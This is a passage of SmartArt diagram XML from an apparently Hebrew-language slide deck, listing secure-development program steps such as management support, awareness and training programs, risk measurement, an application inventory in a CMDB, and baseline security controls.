            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FF7887AA-C07E-468B-8D1C-EBE0E4FADEAD}" type="parTrans" cxnId="{A2824F38-EB06-4D75-AB4C-378B569F1FFE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FAAB9481-62DA-4B10-9C71-AC35FB3DC619}" type="sibTrans" cxnId="{A2824F38-EB06-4D75-AB4C-378B569F1FFE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ADCC6030-6601-49FF-84FE-F0EBA705DE91}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="r" defTabSz="422275" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="950" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:hueOff val="0"/>
                  <a:satOff val="0"/>
                  <a:lumOff val="0"/>
                  <a:alphaOff val="0"/>
                </a:srgbClr>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>השיגו תמיכה של ההנהלה ויישמו </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:hueOff val="0"/>
                  <a:satOff val="0"/>
                  <a:lumOff val="0"/>
                  <a:alphaOff val="0"/>
                </a:srgbClr>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>תוכנית מודעות לנושא פיתוח מאובטח </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:hueOff val="0"/>
                  <a:satOff val="0"/>
                  <a:lumOff val="0"/>
                  <a:alphaOff val="0"/>
                </a:srgbClr>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>לכל אנשי התשתית.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="950" kern="1200" dirty="0">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{83C07B96-C739-4DC0-8568-BD4162DA274A}" type="parTrans" cxnId="{D708F7EB-A8E9-4E44-891E-6C69CC0ACDCF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB4FD935-1E7B-478E-A230-CF4C420A8F3C}" type="sibTrans" cxnId="{D708F7EB-A8E9-4E44-891E-6C69CC0ACDCF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{655384AB-6D3C-47AC-B77F-6E015EDEFD4F}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" algn="r" rtl="1"/>
          <a:r>
            <a:rPr lang="he-IL" sz="950" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>אתרו את </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>דרישות ההגנה</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> עבור פורטפוליו היישומים מתוך ראייה עסקית. הדבר צריך להיות מונע בחלקו מחוקי פרטיות ורגולציות רלוונטיות למידע אשר נדרש להגנה.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="950" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E301BDA2-04A0-471A-AAE0-B2964D1816B7}" type="parTrans" cxnId="{1C0E3C9D-057D-4A7C-BBF8-086EF4E77137}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6EBA2F32-A29E-4FE5-9E91-F4CD3AF3B2F9}" type="sibTrans" cxnId="{1C0E3C9D-057D-4A7C-BBF8-086EF4E77137}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D31DD7FF-2580-430E-9CE3-85368C14CB6A}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" algn="r" rtl="1"/>
          <a:r>
            <a:rPr lang="he-IL" sz="950" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>יישמו </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>מודל פשוט למדידת סיכונים</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> עם סבירות וגורמי השפעה המייצגים את התאבון של הארגון לסיכון.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="950" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{85C35E30-23A3-45B1-942F-BF9426DB09F7}" type="parTrans" cxnId="{490D5B08-3627-4565-ADC8-EA23CA72BCAB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{33A1EF2B-CC45-44CD-B2E9-21167CDD23FC}" type="sibTrans" cxnId="{490D5B08-3627-4565-ADC8-EA23CA72BCAB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E72BBCB8-6D71-4357-A070-661ED37CDDEA}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" algn="r" rtl="1"/>
          <a:r>
            <a:rPr lang="he-IL" sz="950" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>מדדו ותעדפו בהתאם את כלל היישומים וממשקי הפיתוח (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="950" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>APIs</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>). הוסיפו את התוצאות למערכת ה-</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="950" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>CMDB</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="950" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2915CDC0-2B93-4927-91A7-DF994F8CB345}" type="parTrans" cxnId="{114E9BF8-0D0E-47F5-8A0F-2620F7858A5A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5D01A1E9-B730-411F-BD3B-14DD42998220}" type="sibTrans" cxnId="{114E9BF8-0D0E-47F5-8A0F-2620F7858A5A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60CBAF29-8859-4D9A-A47E-21615E7B99A8}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" algn="r" rtl="1"/>
          <a:r>
            <a:rPr lang="he-IL" sz="950" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>יישמו מדריכים לווידוא כיסוי מלא בהתאם לרמת הדרישות.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="950" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA0575EC-42CC-4A33-9403-0D3F7CED113C}" type="parTrans" cxnId="{97CB53AE-A046-4E33-B382-77A6C96B2B42}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{627F5984-7A74-4EF8-B1EF-1FA345435887}" type="sibTrans" cxnId="{97CB53AE-A046-4E33-B382-77A6C96B2B42}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7C5306CB-62DD-439C-9042-9673AE093108}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" algn="r" rtl="1"/>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>יישמו אוסף של </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>מסמכי מדיניות וסטנדרטים </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>ממוקדים אשר מאפשרים נקודת התחלה לפיתוח מאובטח עבור כל צוותי הפיתוח על-מנת שיוכלו להשתמש.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="950" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{66E45F54-AC69-4CC8-8143-92CCA66BD6CB}" type="parTrans" cxnId="{F0F1B160-4BB6-4E1D-9B88-BE7A9C4590DF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E6979349-4CF4-482F-927E-7864339A343F}" type="sibTrans" cxnId="{F0F1B160-4BB6-4E1D-9B88-BE7A9C4590DF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B794BD9D-2A2A-43F9-A836-2AC112F24E37}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" algn="r" rtl="1"/>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>הגדירו </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId7"/>
            </a:rPr>
            <a:t>אוסף בקרות אבטחת מידע בסיסיות</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> המשלים את מסמכי המדיניות והסטנדרטים ומאפשר מדריכים לתכנון ופיתוח בעבודה השוטפת.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="950" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DC0FA470-6D6E-48C6-8AD9-A1938F545EB0}" type="parTrans" cxnId="{FB76F417-AC06-426D-BB63-E9E872C8DFFF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3FDD3E22-9607-41F3-B3B0-09AD922A4942}" type="sibTrans" cxnId="{FB76F417-AC06-426D-BB63-E9E872C8DFFF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7BEDF829-9DBD-4FC0-B5F9-FD7477F5B55E}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" algn="r" rtl="1"/>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>יישמו </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>תוכנית הכשרה לנושא פיתוח מאובטח</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> המחוייב ומיועד לתפקידי פיתוח ונושאים שונים.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="950" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{583D64A8-6B10-470D-A6AE-095A12B5233B}" type="parTrans" cxnId="{456A4F48-CC7F-42BC-8BA2-ACC354241412}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{02BD7F49-0B8D-42A2-B035-32D0579B802C}" type="sibTrans" cxnId="{456A4F48-CC7F-42BC-8BA2-ACC354241412}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6998A190-A8BB-4E71-8A37-950D580E5161}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" algn="r" rtl="1"/>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>הגדירו ושלבו </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>יישום מאובטח</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
